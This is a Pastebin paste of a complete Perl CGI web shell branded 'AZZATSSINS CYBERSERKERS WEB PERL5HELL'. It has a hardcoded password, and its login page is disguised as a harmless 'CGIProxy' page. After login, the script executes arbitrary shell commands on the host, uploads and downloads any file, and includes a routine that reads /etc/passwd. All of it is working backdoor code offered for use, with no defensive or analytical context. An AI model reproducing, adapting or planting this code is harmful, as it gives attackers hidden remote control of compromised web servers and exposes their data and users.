API tools faq
paste
EddieKidiw

Perl AZZATSSINS CYBERSERKERS WEB PERL5HELL

EddieKidiw
Mar 13th, 2016
236
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.48 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl -I/usr/local/bandmin
  2. $NTCmdSep = "&";
  3. $UnixCmdSep = ";";
  4. $CommandTimeoutDuration = 300;
  5. $ShowDynamicOutput = 1;
  6. $azzatssins = "AZ404";
  7. $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
  8. $CmdPwd = ($WinNT ? "cd" : "pwd");
  9. $PathSep = ($WinNT ? "\\" : "/");
  10. $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
  11. sub ReadParse
  12. {
  13. local (*in) = @_ if @_;
  14. local ($i, $loc, $key, $val);
  15.  
  16. $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
  17.  
  18. if($ENV{'REQUEST_METHOD'} eq "GET")
  19. {
  20. $in = $ENV{'QUERY_STRING'};
  21. }
  22. elsif($ENV{'REQUEST_METHOD'} eq "POST")
  23. {
  24. binmode(STDIN) if $MultipartFormData & $WinNT;
  25. read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
  26. }
  27. if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
  28. {
  29. $Boundary = '--'.$1;
  30. @list = split(/$Boundary/, $in);
  31. $HeaderBody = $list[1];
  32. $HeaderBody =~ /\r\n\r\n|\n\n/;
  33. $Header = $`;
  34. $Body = $';
  35. $Body =~ s/\r\n$//;
  36. $in{'filedata'} = $Body;
  37. $Header =~ /filename=\"(.+)\"/;
  38. $in{'f'} = $1;
  39. $in{'f'} =~ s/\"//g;
  40. $in{'f'} =~ s/\s//g;
  41.  
  42. # parse trailer
  43. for($i=2; $list[$i]; $i++)
  44. {
  45. $list[$i] =~ s/^.+name=$//;
  46. $list[$i] =~ /\"(\w+)\"/;
  47. $key = $1;
  48. $val = $';
  49. $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
  50. $val =~ s/%(..)/pack("c", hex($1))/ge;
  51. $in{$key} = $val;
  52. }
  53. }
  54. else # standard post data (url encoded, not multipart)
  55. {
  56. @in = split(/&/, $in);
  57. foreach $i (0 .. $#in)
  58. {
  59. $in[$i] =~ s/\+/ /g;
  60. ($key, $val) = split(/=/, $in[$i], 2);
  61. $key =~ s/%(..)/pack("c", hex($1))/ge;
  62. $val =~ s/%(..)/pack("c", hex($1))/ge;
  63. $in{$key} .= "\0" if (defined($in{$key}));
  64. $in{$key} .= $val;
  65. }
  66. }
  67. }
  68.  
  69. sub foo
  70. {
  71. my ( $login, $p, $uid, $gid, $gecos, $dir, $s );
  72.  
  73. my %HoH = ();
  74.  
  75. my $file = '/etc/passwd';
  76. open( PASSWD, "< $file" ) or die "Can't open $file : $!";
  77.  
  78. while( <PASSWD> ) {
  79. ( $login, $p, $uid, $gid, $gecos, $dir, $s ) = split( ':' );
  80.  
  81. $HoH{ $login }{ 'uid' } = $uid;
  82. $HoH{ $login }{ 'gid' } = $gid;
  83. $HoH{ $login }{ 'dir' } = $dir;
  84. }
  85.  
  86. close PASSWD;
  87.  
  88. return \%HoH;
  89. }
  90. sub PrintPageHeader
  91. {
  92. $EncodedCurrentDir = $CurrentDir;
  93. $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  94. print "Content-type: text/html\n\n";
  95. print <<END;
  96. <meta content=PERLWEB5SHELL-BY-AZZATSSINS-CYBERSERKERS name=description>
  97. END
  98. }
  99.  
  100. sub PrintLoginScreen
  101. {
  102. $Message = q$
  103. $;
  104. #'
  105. print <<END;
  106. $Message
  107. END
  108. }
  109. sub PrintLoginFailedMessage
  110. {
  111. print <<END;
  112. <code>
  113. <center><br>WHAT THE HELL ARE YOU DOING...!!!<br>
  114. </center>
  115. </code>
  116. END
  117. }
  118.  
  119. sub PrintLoginForm
  120. {
  121. print <<END;
  122. <code>
  123. <html>
  124. <head>
  125. <title>Start Using CGIProxy</title>
  126. </head>
  127. <body onload="document.URLform.URL.focus() ; if (document.URLform.URL.value.match(/^\x01/)) document.URLform.URL.value= _proxy_jslib_wrap_proxy_decode(document.URLform.URL.value.replace(/\x01/, ''))">
  128. <p>
  129.  
  130. <h1>CGIProxy</h1>
  131. <p>Start browsing through this CGI-based proxy by entering a URL below.
  132. Only HTTP and FTP URLs are supported. Not all functions will work
  133. (e.g. some Java applets), but most pages will be fine.
  134.  
  135. <form name="f" method="POST" action="$ScriptLocation">
  136. <input type="hidden" name="a" value="login"><input name="p" size=66 value="">
  137. <br><input type=checkbox id="rc" name="rc"><label for="rc"> Remove all cookies (except certain proxy cookies)</label>
  138. <br><input type=checkbox id="rs" name="rs"><label for="rs"> Remove all scripts (recommended for anonymity)</label>
  139. <br><input type=checkbox id="fa" name="fa"><label for="fa"> Remove ads</label>
  140. <br><input type=checkbox id="br" name="br"><label for="br"> Hide referrer information</label>
  141. <br><input type=checkbox id="if" name="if" checked><label for="if"> Show URL entry form</label>
  142.  
  143. <p><input type=submit value=" Begin browsing ">
  144. </form>
  145.  
  146. <h3><a href="mailto:cyberserkers@gmail.com">Manage cookies</a></h3>
  147. <p>
  148. <hr>
  149. <table width="100%"><tr>
  150. <td align=left>
  151. <i><a href="http://wget.yu.tl">CGIProxy 2.1.10</a>
  152. (<a href="http://azzatssinz.tumblr.com">download</a>)</i>
  153. </td>
  154. <td align=right>
  155. <a href="http://azzatssinz.tumblr.com"><i>Restart</i></a>
  156. </td>
  157. </tr></table>
  158. <p>
  159. </body>
  160. </html>
  161. </code>
  162. END
  163. }
  164. sub PrintPageFooter
  165. {
  166. print "</font></body></html>";
  167. }
  168.  
  169. sub GetCookies
  170. {
  171. @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
  172. foreach $cookie(@httpcookies)
  173. {
  174. ($id, $val) = split(/=/, $cookie);
  175. $Cookies{$id} = $val;
  176. }
  177. }
  178.  
  179. sub PrintLogoutScreen
  180. {
  181. print "<code><center><a href=http://azzatssinz.tumblr.com>LogOut Success...</a></center><br><br></code>";
  182. }
  183.  
  184. sub PerformLogout
  185. {
  186. print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
  187. &PrintPageHeader("p");
  188. &PrintLogoutScreen;
  189. &PrintLoginScreen;
  190. &PrintLoginForm;
  191. &PrintPageFooter;
  192. }
  193.  
  194. sub PerformLogin
  195. {
  196. if($LoginPassword eq $azzatssins) # password matched
  197. {
  198. print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
  199. &PrintPageHeader("c");
  200. &PrintCommandLineInputForm;
  201. &PrintPageFooter;
  202. }
  203. else # password didn't match
  204. {
  205. &PrintPageHeader("p");
  206. &PrintLoginScreen;
  207. if($LoginPassword ne "") # some password was entered
  208. {
  209. &PrintLoginFailedMessage;
  210. }
  211. &PrintLoginForm;
  212. &PrintPageFooter;
  213. }
  214. }
  215.  
  216. sub PrintCommandLineInputForm
  217. {
  218. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\ ";
  219. print <<END;
  220. <code>
  221. <title>.: AZZATSSINS CYBERSERKERS WEB PERL5HELL :.</title><body bgcolor=silver>
  222. <center><a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir"><img src=https://lh3.googleusercontent.com/-qg8PY7S9LsM/VtENkUuLg8I/AAAAAAAAAPE/7PnXFF4-3n0/w480-h480/AZZATSSINS.png><br></a><br><font color=silver>=====================</font><br><br><form name="f" method="POST" action="$ScriptLocation">
  223. <input type="hidden" name="a" value="command">
  224. <input type="hidden" name="d" value="$CurrentDir">
  225. <b><i><font color="red">$Prompt</font>
  226. </i></b><br>
  227. <input type="text" name="c" size="25">
  228. <input type="submit" value="Enter">
  229. </form>
  230. </center>
  231. </code>
  232.  
  233. END
  234. }
  235.  
  236. sub PrintFileDownloadForm
  237. {
  238. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\ ";
  239. print <<END;
  240. <code>
  241. <title>.: AZZATSSINS CYBERSERKERS WEB PERL5HELL :.</title><body bgcolor=silver>
  242. <center><img src=http://s28.postimg.org/tixvhu6nx/narsis.png><br>
  243. <font color=lime><b><i><form name="f" method="POST" action="$ScriptLocation">
  244. <input type="hidden" name="d" value="$CurrentDir">
  245. <input type="hidden" name="a" value="download">
  246. $Prompt download<br><br>
  247. Filename: <input type="text" name="f" size="35"><br><br>
  248. Download: <input type="submit" value="Begin">
  249. </form>
  250. </i></b></font></center>
  251. </code>
  252. END
  253. }
  254.  
  255. sub PrintFileUploadForm
  256. {
  257. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\ ";
  258. print <<END;
  259. <code>
  260. <title>.: AZZATSSINS CYBERSERKERS WEB PERL5HELL :.</title><body bgcolor=silver>
  261. <center><img src=https://lh3.googleusercontent.com/-qg8PY7S9LsM/VtENkUuLg8I/AAAAAAAAAPE/7PnXFF4-3n0/w480-h480/AZZATSSINS.png><br>
  262. <font color="lime"><b><i>[<a href="$ScriptLocation?">Home</a>] [<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a>] [<a href="$ScriptLocation?a=logout">Logout</a>
  263. ]</i></b></font><br><font color=lime><b><i><form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
  264. $Prompt upload<br><br>
  265. Filename: <input type="file" name="f" size="35"><br><br>
  266. Options: <input type="checkbox" name="o" value="overwrite">
  267. Overwrite if it Exists<br><br>
  268. Upload: <input type="submit" value="Begin">
  269. <input type="hidden" name="d" value="$CurrentDir">
  270. <input type="hidden" name="a" value="upload">
  271. </form></i></b></font>
  272. </center>
  273. </code>
  274. END
  275. }
  276.  
  277. sub CommandTimeout
  278. {
  279. if(!$WinNT)
  280. {
  281. alarm(0);
  282. print <<END;
  283. </xmp>
  284. <code>
  285. Command exceeded maximum time of $CommandTimeoutDuration second(s).
  286. <br>Killed it!
  287. <code>
  288. END
  289. &PrintCommandLineInputForm;
  290. &PrintPageFooter;
  291. exit;
  292. }
  293. }
  294. sub ExecuteCommand
  295. {
  296. if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
  297. {
  298.  
  299. $OldDir = $CurrentDir;
  300. $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
  301. chop($CurrentDir = `$Command`);
  302. &PrintPageHeader("c");
  303. &PrintCommandLineInputForm;
  304. print "<div style='float: center; text-align: left;'>";
  305. $Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\ ";
  306. print "<code><center><font color=violet><b><i>$Prompt <br> $RunCommand</i></b></font></center></code>";
  307. }
  308. else # some other command, display the output
  309. {
  310. &PrintPageHeader("c");
  311. &PrintCommandLineInputForm;
  312. print "<div style='float: center; text-align: left;'>";
  313. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\ ";
  314. print "<code><center><font color=violet><b><i>$Prompt <br> $RunCommand<br></i></b></font></center></code><xmp style='color: #00FF00;'>";
  315. $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
  316. if(!$WinNT)
  317. {
  318. $SIG{'ALRM'} = \&CommandTimeout;
  319. alarm($CommandTimeoutDuration);
  320. }
  321. if($ShowDynamicOutput) # show output as it is generated
  322. {
  323. $|=1;
  324. $Command .= " |";
  325. open(CommandOutput, $Command);
  326. while(<CommandOutput>)
  327. {
  328. $_ =~ s/(\n|\r\n)$//;
  329. print "$_\n";
  330. }
  331. $|=0;
  332. }
  333. else # show output after command completes
  334. {
  335. print "<code><center><b><i><font color=orange> `$Command` </font></i></b></center></code>";
  336. }
  337. if(!$WinNT)
  338. {
  339. alarm(0);
  340. }
  341. print "</xmp>";
  342. }
  343. print "</div>";
  344. &PrintPageFooter;
  345. }
  346.  
  347. sub PrintDownloadLinkPage
  348. {
  349. local($FileUrl) = @_;
  350. if(-e $FileUrl) # if the file exists
  351. {
  352. # encode the file link so we can send it to the browser
  353. $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  354. $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
  355. $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
  356. &PrintPageHeader("c");
  357. print <<END;
  358. <code>
  359. Sending File $TransferFile...<br>
  360. If the download does not start automatically,
  361. <a href="$DownloadLink">Click Here</a>.
  362. </code>
  363. END
  364. &PrintCommandLineInputForm;
  365. &PrintPageFooter;
  366. }
  367. else # file doesn't exist
  368. {
  369. &PrintPageHeader("f");
  370. print "<code>Failed to download $FileUrl: $!</code>";
  371. &PrintFileDownloadForm;
  372. &PrintPageFooter;
  373. }
  374. }
  375.  
  376. sub SendFileToBrowser
  377. {
  378. local($SendFile) = @_;
  379. if(open(SENDFILE, $SendFile)) # file opened for reading
  380. {
  381. if($WinNT)
  382. {
  383. binmode(SENDFILE);
  384. binmode(STDOUT);
  385. }
  386. $FileSize = (stat($SendFile))[7];
  387. ($Filename = $SendFile) =~ m!([^/^\\]*)$!;
  388. print "Content-Type: application/x-unknown\n";
  389. print "Content-Length: $FileSize\n";
  390. print "Content-Disposition: attachment; filename=$1\n\n";
  391. print while(<SENDFILE>);
  392. close(SENDFILE);
  393. }
  394. else # failed to open file
  395. {
  396. &PrintPageHeader("f");
  397. print "<code>Failed to download $SendFile: $!</code>";
  398. &PrintFileDownloadForm;
  399. &PrintPageFooter;
  400. }
  401. }
  402.  
  403.  
  404. sub BeginDownload
  405. {
  406. # get fully qualified path of the file to be downloaded
  407. if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  408. (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  409. {
  410. $TargetFile = $TransferFile;
  411. }
  412. else # path is relative
  413. {
  414. chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  415. $TargetFile .= $PathSep.$TransferFile;
  416. }
  417.  
  418. if($Options eq "go") # we have to send the file
  419. {
  420. &SendFileToBrowser($TargetFile);
  421. }
  422. else # we have to send only the link page
  423. {
  424. &PrintDownloadLinkPage($TargetFile);
  425. }
  426. }
  427.  
  428. sub UploadFile
  429. {
  430. # if no file is specified, print the upload form again
  431. if($TransferFile eq "")
  432. {
  433. &PrintPageHeader("f");
  434. &PrintFileUploadForm;
  435. &PrintPageFooter;
  436. return;
  437. }
  438. &PrintPageHeader("c");
  439.  
  440. # start the uploading process
  441. print "<code>Uploading $TransferFile to $CurrentDir...<br>";
  442.  
  443. # get the fullly qualified pathname of the file to be created
  444. chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
  445. $TransferFile =~ m!([^/^\\]*)$!;
  446. $TargetName .= $PathSep.$1;
  447.  
  448. $TargetFileSize = length($in{'filedata'});
  449. # if the file exists and we are not supposed to overwrite it
  450. if(-e $TargetName && $Options ne "overwrite")
  451. {
  452. print "Failed: Destination file already exists.<br>";
  453. }
  454. else # file is not present
  455. {
  456. if(open(UPLOADFILE, ">$TargetName"))
  457. {
  458. binmode(UPLOADFILE) if $WinNT;
  459. print UPLOADFILE $in{'filedata'};
  460. close(UPLOADFILE);
  461. print "Transfered $TargetFileSize Bytes.<br>";
  462. print "File Path: $TargetName<br>";
  463. }
  464. else
  465. {
  466. print "Failed: $!<br>";
  467. }
  468. }
  469. print "</code>";
  470. &PrintCommandLineInputForm;
  471. &PrintPageFooter;
  472. }
  473.  
  474. sub DownloadFile
  475. {
  476. # if no file is specified, print the download form again
  477. if($TransferFile eq "")
  478. {
  479. &PrintPageHeader("f");
  480. &PrintFileDownloadForm;
  481. &PrintPageFooter;
  482. return;
  483. }
  484.  
  485. # get fully qualified path of the file to be downloaded
  486. if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  487. (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  488. {
  489. $TargetFile = $TransferFile;
  490. }
  491. else # path is relative
  492. {
  493. chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  494. $TargetFile .= $PathSep.$TransferFile;
  495. }
  496.  
  497. if($Options eq "go") # we have to send the file
  498. {
  499. &SendFileToBrowser($TargetFile);
  500. }
  501. else # we have to send only the link page
  502. {
  503. &PrintDownloadLinkPage($TargetFile);
  504. }
  505. }
  506.  
  507. &ReadParse;
  508. &GetCookies;
  509.  
  510. $ScriptLocation = $ENV{'SCRIPT_NAME'};
  511. $ServerName = $ENV{'SERVER_NAME'};
  512. $LoginPassword = $in{'p'};
  513. $RunCommand = $in{'c'};
  514. $TransferFile = $in{'f'};
  515. $Options = $in{'o'};
  516.  
  517. $Action = $in{'a'};
  518. $Action = "login" if($Action eq ""); # no action specified, use default
  519.  
  520. # get the directory in which the commands will be executed
  521. $CurrentDir = $in{'d'};
  522. chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
  523.  
  524. $LoggedIn = $Cookies{'SAVEDPWD'} eq $azzatssins;
  525.  
  526. if($Action eq "login" || !$LoggedIn) # user needs/has to login
  527. {
  528. &PerformLogin;
  529. }
  530. elsif($Action eq "command") # user wants to run a command
  531. {
  532. &ExecuteCommand;
  533. }
  534. elsif($Action eq "upload") # user wants to upload a file
  535. {
  536. &UploadFile;
  537. }
  538. elsif($Action eq "download") # user wants to download a file
  539. {
  540. &DownloadFile;
  541. }
  542. elsif($Action eq "logout") # user wants to logout
  543. {
  544. &PerformLogout;
  545. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!